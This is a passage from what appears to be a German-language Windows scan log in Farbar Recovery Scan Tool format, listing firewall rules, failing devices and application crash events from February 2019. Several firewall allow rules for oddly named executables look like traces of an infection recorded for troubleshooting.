FirewallRules: [{D767E2C2-8EFC-47EC-A222-8908DF362001}] => (Allow) C:\Program Files (x86)\MediaMonkey\MediaMonkey.exe (Ventis Media, Inc. -> Ventis Media Inc.)
FirewallRules: [{FC13A2C4-1E10-4940-8FB7-1B2F95CEF7E3}] => (Allow) C:\Program Files (x86)\MediaMonkey\MediaMonkey.exe (Ventis Media, Inc. -> Ventis Media Inc.)
FirewallRules: [{A3D63284-336C-4A6B-A0A7-1B10C58343D3}] => (Allow) C:\Program Files (x86)\MediaMonkey\MediaMonkey.exe (Ventis Media, Inc. -> Ventis Media Inc.)
FirewallRules: [{CE9FF0C5-7172-4FFF-9615-772190FAC974}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{2C3B9DC2-0038-4424-9DD8-5D82172CA164}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{0B31C39C-CA5D-421D-BD1F-26469FB28BB1}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{08E76EA5-1392-4748-AC93-806A67DFE454}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{2E514D88-B475-4939-B6CF-1AFB5C9BA23B}] => (Allow) C:\Program Files (x86)\Software4u\iDevice Manager\Software4u.IDeviceManager.exe (Tino Marx -> Marx Softwareentwicklung - www.software4u.de)
FirewallRules: [{F8038714-8A13-40B7-A40D-69B45D3F2518}] => (Allow) C:\Program Files (x86)\Software4u\iDevice Manager\Software4u.IDeviceManager.exe (Tino Marx -> Marx Softwareentwicklung - www.software4u.de)
FirewallRules: [{71291B87-6F12-47C7-9230-37752FCA04F4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{ECF9D2D2-8877-4FF0-8310-89A4F869C288}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{00D3DDBF-88EB-4648-BE7C-826448050F8D}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{D12EFD8C-0019-44A2-89E4-3EA015CB800F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{2D3C681E-92AA-4D30-942D-842B29BF26BC}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{6154D42B-860B-411D-BA05-CC9EDDEE7521}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{ABDFFBC5-D4B5-4044-9C74-2FB1CDFE53EF}] => (Allow) LPort=8298
FirewallRules: [{24BCB3E1-70CB-4FE2-B926-5D5E2D096ED6}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{A2B6EEF0-5911-44B2-98A4-889735D0D550}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [UDP Query User{01EE4636-8D4D-4EF5-98A5-C1402F080446}D:\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{9D67DC0F-5B23-4C1B-B4E6-8F6B4231BB4D}D:\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{5FFF2853-6544-44D5-BDB3-56C69DAC89A4}D:\fortnite\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) D:\fortnite\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{A1E77B52-3B88-4046-90AE-81A007FDE2FE}D:\fortnite\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) D:\fortnite\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{AB837A47-EB3A-41BD-85F5-C7C7799ECE8D}C:\program files\nzbget\nzbget.exe] => (Block) C:\program files\nzbget\nzbget.exe ()
FirewallRules: [UDP Query User{76F49772-A380-48E9-8273-005DB1C81BD0}C:\program files\nzbget\nzbget.exe] => (Block) C:\program files\nzbget\nzbget.exe ()
FirewallRules: [TCP Query User{8C17E6F2-B895-4CC2-B6E8-705E5588701A}C:\users\fantacola\appdata\local\blue jeans\app\bluejeans.exe] => (Allow) C:\users\fantacola\appdata\local\blue jeans\app\bluejeans.exe (Blue Jeans Network -> Blue Jeans)
FirewallRules: [UDP Query User{B934B22D-CEBB-4C9A-BEBF-FCF9C5D8C9A5}C:\users\fantacola\appdata\local\blue jeans\app\bluejeans.exe] => (Allow) C:\users\fantacola\appdata\local\blue jeans\app\bluejeans.exe (Blue Jeans Network -> Blue Jeans)
FirewallRules: [{38071752-79C7-4220-BE36-CA1E266D284A}] => (Allow) C:\Program Files (x86)\Plex\Plex Media Server\Plex Media Server.exe (Plex, Inc -> Plex, Inc.)
FirewallRules: [{9B4BB9BB-BA53-4340-95FD-CC80BA377E67}] => (Allow) C:\Program Files (x86)\Plex\Plex Media Server\PlexScriptHost.exe (Plex, Inc -> Python Software Foundation)
FirewallRules: [{9F08108D-B023-4C9B-8E78-BB5D3221E706}] => (Allow) C:\Program Files (x86)\Plex\Plex Media Server\Plex DLNA Server.exe (Plex, Inc -> Plex, Inc.)
FirewallRules: [{742A99D7-493A-4EA3-B42E-21CF41A1C934}] => (Allow) C:\Program Files (x86)\Plex\Plex Media Server\Plex Tuner Service.exe (Plex, Inc -> Plex)
FirewallRules: [{0759FC24-E017-4E0A-A758-8E52D6CE6ADB}] => (Allow) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.EXE (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{325F9C41-5CDA-44F7-98A8-CB84DFE69ECB}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{291956C3-1538-4CBC-8F43-1E004DEFE41F}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [TCP Query User{80E797A1-D8D5-4BF0-89B3-5FC3E73AD442}C:\users\fantacola\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\fantacola\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{AFC4E780-4675-4C15-96AC-48C53692F92A}C:\users\fantacola\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\fantacola\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{390BE93C-D858-4801-BC33-831B7C1137F0}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12093.3.37141.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{056F54A6-AA1D-4122-9FBA-C5911D6FCE8E}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12093.3.37141.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9488D7FA-CDEF-4F4B-8238-D0368D414DB5}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12093.3.37141.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{CA6ADBAB-D616-4B19-8057-61F578D7AFEE}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12093.3.37141.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{D07EA806-5142-4EEA-BF07-335ACE34E70D}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12093.3.37141.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{F6076CFE-6B46-4EDC-B3EF-13724C778D89}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12093.3.37141.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{957BF35F-042D-4CB7-BD03-CE85EC3E5705}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12093.3.37141.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{8C56E1C1-C016-460F-869B-6F6E931D76E3}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12093.3.37141.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{3825B971-9C25-448A-83AB-31C7101452F2}] => (Allow) C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCoLtd.SamsungFlux_3.7.11.0_x64__wyx1vj98g3asy\DesktopApp\SamsungFlowDesktop.exe ()
FirewallRules: [{66D192D3-314A-42B0-9A97-4032BD34A194}] => (Allow) C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCoLtd.SamsungFlux_3.7.11.0_x64__wyx1vj98g3asy\DesktopApp\SamsungFlowDesktop.exe ()
FirewallRules: [{1C36F0BD-BF4E-4600-BC9F-6095826464C9}] => (Allow) C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCoLtd.SamsungFlux_3.7.11.0_x64__wyx1vj98g3asy\DesktopApp\SamsungFlowDesktop.exe ()
FirewallRules: [{E482A7AC-D391-42BD-B3D5-4E701D902072}] => (Allow) C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCoLtd.SamsungFlux_3.7.11.0_x64__wyx1vj98g3asy\DesktopApp\SamsungFlowDesktop.exe ()
FirewallRules: [{D851A2DC-D960-465A-B4E3-D7C50BE4615D}] => (Allow) C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCoLtd.SamsungFlux_3.7.11.0_x64__wyx1vj98g3asy\DesktopApp\SamsungFlowDesktop.exe ()
FirewallRules: [{F77B92DF-50F9-4F52-A7F6-E9DC047175AC}] => (Allow) C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCoLtd.SamsungFlux_3.7.11.0_x64__wyx1vj98g3asy\DesktopApp\SamsungFlowDesktop.exe ()
FirewallRules: [{5A5FF185-6709-4814-B4AB-7C95AA25AA5B}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.99.250.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{6BE027BF-8D06-4198-B599-089946F8D8CF}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.99.250.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{AABF26A6-D871-4295-9148-462AC74C6C1F}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.99.250.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{07572D32-8DE0-4695-9E62-33B67BBB8E6F}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.99.250.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{B3B9605A-F17D-498A-A73E-FC49EA9B19E6}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.99.250.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{7D977017-2FD3-4C6E-AC63-38477FDB25AE}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.99.250.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{61F33535-070B-4114-B147-F31FE8AE275A}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.99.250.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{EF889860-10EA-457C-864B-EFD6C14BCE8F}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.99.250.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{7A8F520A-4C01-4D17-8E9D-C46F5FD9CED1}] => (Allow) 㩃啜敳獲䙜湡慴潣慬䅜灰慄慴剜慯業杮楜普卯睩楜普卯睩攮數 Keine Datei
FirewallRules: [{F33B5A46-B354-465D-9364-C52B61FFC696}] => (Allow) 㩃啜敳獲䙜湡慴潣慬䅜灰慄慴剜慯業杮楜普卯睩剜湵䥓攮數 Keine Datei
FirewallRules: [{02B11E72-834F-4BE6-9774-05235E7A8E8A}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{00D8C773-4A3F-42D1-ACC3-3D686A4AA49C}] => (Allow) C:\Program Files (x86)\Common Files\oIOi.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{492A0EA2-0BBF-455F-8F83-4A20085C1A9B}] => (Allow) C:\WINDOWS\ARUOujXDisM.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{C388CFD6-0A0D-4540-AF9E-6000E4EF30E4}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{1C6F608D-D997-4A93-A360-B16EADF91D84}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{A25BE70E-2FE5-4720-8B8E-70BAAF6162DF}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{56B0BDDF-2D0B-466A-84F7-0F7DFFE9255B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{3C40E4B3-124D-4CBB-BB67-1C15B7FDE91B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{2843D21D-B8E2-47C5-A05C-F4CB9B4545D2}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{EE07CB66-8301-419D-84B5-CD981AA24A11}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{D8524E89-CB5F-496A-ACBE-C2C55C21ADE1}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{8D643ACB-B279-4280-8B61-BAF880623792}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{BCA38FA9-EC47-4F0E-B51A-DAEBB7B925BA}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{A274F712-6BFC-465D-AA5A-F6C71E791570}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{BA4C7024-EA35-4E97-86CA-86575846BD44}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{7D7390F0-8993-481B-8078-9955C86F9FCC}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{0108253A-5225-4477-8C95-C3AF426051F3}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{A0A85A15-1A3A-43BB-BBCC-8F0935713640}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{D6B6ABD2-E405-4EFA-8BA4-2EDF9C783EBA}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{40FE5FB6-38A0-4D53-838F-B21BA440FC14}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{AE63BF89-E3C6-43DC-945B-5EE648D8BEBB}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{8E3C28B5-5939-4A24-983D-3D66C66EF1A0}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{03FCB264-CB1A-4877-9395-F69976651061}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{2A6176EE-BA14-405B-A138-7FFA9402D727}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{FBE13B68-02AD-4AF5-8758-5E320CAD9B2D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{F9CA007A-D660-4D07-8422-1A24392E1E0E}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{DEE02D22-2CB6-4CD2-98D2-FDC3677D03B6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{0104C05F-71E7-4DDE-A4D8-AA4DC1AE07EB}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{312212AE-3AFD-42F8-8BAF-48B476A718C5}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{640A59F2-428A-4BB3-87FC-80FBDA777EE6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{40753AD4-D438-44C2-88E8-676087F6A1C9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{3F377212-BE33-4FA6-8F57-FD68812CE9B1}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{20152B29-581C-41A9-BA84-F780C1A68D4D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{4CEF84D1-C4C9-4B2A-93C7-D4A41E8C15BF}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{90492F37-86A3-451B-9BBA-9632DFF729EB}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{76015702-4008-4734-879A-0FF0AD5997BA}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{6D3659F6-1BCC-4E4C-8CE0-8FC10D244691}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{EE7EEAC9-2E92-44A9-B4B8-03D3C7D3F7C3}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{23F99174-1C63-4DFC-B732-4D8B2E4681DB}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{554C25DE-EE97-4DC3-989B-DB77F16A3AB2}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{56580439-E113-4490-95B1-54034358FD86}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{BE140409-1547-4D82-9A11-0DF25A405542}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{1B43BF14-6AF3-47C7-BD1D-40A445786C7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{F3D30751-FDA4-4A27-87C6-23963F65F504}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{8076AFCA-BB00-4DDF-808A-8087277EEE8F}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{FF658625-E46D-4245-954C-F7D6C6285E5C}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{13FF4A59-51E5-45D7-AC68-761491494F31}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{0659D58F-4D47-4F1F-817C-FB17AE1018C9}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{11E020E2-4786-419A-89D1-9F90CBE061DA}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{567401C0-5BD8-4BB3-8D0C-D662C011CE5A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{419BA736-89A2-4850-A728-F73B6950D6F9}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0DC1AFA3-58A2-4262-BA68-ED04168FE63E}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{2980AFE2-31AD-4B35-B36E-3C2DC13CE26E}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{B9B8C3B7-6DAC-4F42-9D53-2E090F9A082C}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{31CAF929-25EB-4135-BE90-2574E50A64BC}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D18F223E-8357-45C6-9F15-926F6732B632}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{EE7FFE15-63DF-402D-9C35-1B1380103BAC}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0804AEAD-2200-4969-A42E-A37E38175535}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0B74DAF0-1421-42DC-B320-75D034EED642}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{0E3CA24A-8DCD-479E-8387-E02007C172D5}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{8F69B78F-1BEA-4069-A179-91EAA4C84DE7}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{7CAD293D-2BBA-4F07-8220-DE1C573D519E}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)

==================== Wiederherstellungspunkte =========================

11-02-2019 22:27:11 Windows Update

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: AMD High Definition Audio Device
Description: AMD High Definition Audio Device
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Advanced Micro Devices
Service: AtiHDAudioService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft Hyper-V-Virtualisierungsinfrastrukturtreiber
Description: Microsoft Hyper-V-Virtualisierungsinfrastrukturtreiber
Class Guid: {4d36e97d-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: Vid
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Trusted Platform Module 2.0
Description: Trusted Platform Module 2.0
Class Guid: {d94ee5d8-d189-4994-83d2-f68d7d41b0e6}
Manufacturer: (Standard)
Service: TPM
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: PS/2-Standardtastatur
Description: PS/2-Standardtastatur
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standardtastaturen)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: Microsoft PS/2-Maus
Description: Microsoft PS/2-Maus
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (02/12/2019 07:44:49 AM) (Source: PerfNet) (EventID: 2004) (User: )
Description: Das Serverdienst-Leistungsobjekt kann nicht geöffnet werden. Die ersten vier Bytes (DWORD) des Datenabschnitts enthalten den Statuscode.

Error: (02/12/2019 07:44:45 AM) (Source: SetupARService) (EventID: 0) (User: )
Description: Der Dienst kann nicht gestartet werden. System.NullReferenceException: Der Objektverweis wurde nicht auf eine Objektinstanz festgelegt.
  bei SetupAfterRebootService.SetupARService.OnStart(String[] args)
  bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (02/12/2019 07:42:23 AM) (Source: PerfNet) (EventID: 2004) (User: )
Description: Das Serverdienst-Leistungsobjekt kann nicht geöffnet werden. Die ersten vier Bytes (DWORD) des Datenabschnitts enthalten den Statuscode.

Error: (02/11/2019 11:25:28 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm mbam.exe Version 3.1.0.1731 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 3560

Startzeit: 01d4c258a5c751f0

Beendigungszeit: 4294967295

Anwendungspfad: C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe

Bericht-ID: 955b8bf5-6689-4f03-98d7-f5e6af6d6654

Vollständiger Name des fehlerhaften Pakets:

Relative Anwendungs-ID des fehlerhaften Pakets:

Absturztyp: Unknown

Error: (02/11/2019 11:16:18 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm firefox.exe Version 65.0.0.6963 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 2fec

Startzeit: 01d4c2574cf4a1e3

Beendigungszeit: 4294967295

Anwendungspfad: C:\Program Files\Mozilla Firefox\firefox.exe

Bericht-ID: 876797d0-907b-4126-ae12-7cd74f776b8d

Vollständiger Name des fehlerhaften Pakets:

Relative Anwendungs-ID des fehlerhaften Pakets:

Absturztyp: Top level window is idle

Error: (02/11/2019 11:15:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm chrome.exe Version 71.0.3578.98 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 1d58

Startzeit: 01d4c256eabd4704

Beendigungszeit: 4294967295

Anwendungspfad: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Bericht-ID: 513a1ff9-6310-4b84-bcdb-8f571fe3e40a

Vollständiger Name des fehlerhaften Pakets:

Relative Anwendungs-ID des fehlerhaften Pakets:

Absturztyp: Top level window is idle

Error: (02/11/2019 11:15:18 PM) (Source: Application Hang) (EventID: 1002) (User: )
